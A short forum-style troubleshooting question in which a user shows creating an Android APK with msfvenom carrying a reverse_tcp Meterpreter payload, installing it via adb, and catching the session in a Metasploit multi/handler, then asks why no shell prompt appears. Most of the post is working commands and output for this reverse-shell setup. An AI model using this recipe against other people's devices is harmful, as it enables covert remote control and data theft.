Knowledge Base

Ask A Question

Questions

5

Does not open Meterpreter shell on android exploit.

I created an apk file via msfvenom, root@root:~$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.54 LPORT=4444 R > met.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8805 bytes intsalled an android phone root@root:~$ adb install met.apk met.apk: 1 file pushed. 2.5 MB/s (8812 bytes in 0.003s) pkg: /data/local/tmp/met.apk Success and opened mainactivity app from android launcher. Then i open msfconsole and run exploit cammand root@root:~$ msfconsole =[ metasploit v4.16.11-dev- ] + -- --=[ 1694 exploits - 968 auxiliary - 299 post ] + -- --=[ 499 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.43.54 LHOST => 192.168.43.54 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Exploit running as background job 0. msf exploit(handler) > [*] Started reverse TCP handler on 192.168.43.54:4444 [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.54:4444 -> 192.168.43.1:42939) at 2017-10-12 18:57:59 +0530 this shows only Meterpreter session 1 opened and does not open Meterpreter shell Meterpreter> i used metasploit framework v4.16.11-dev- on ubuntu 17.04 LTS how can i do?

Posted by shamil about a year ago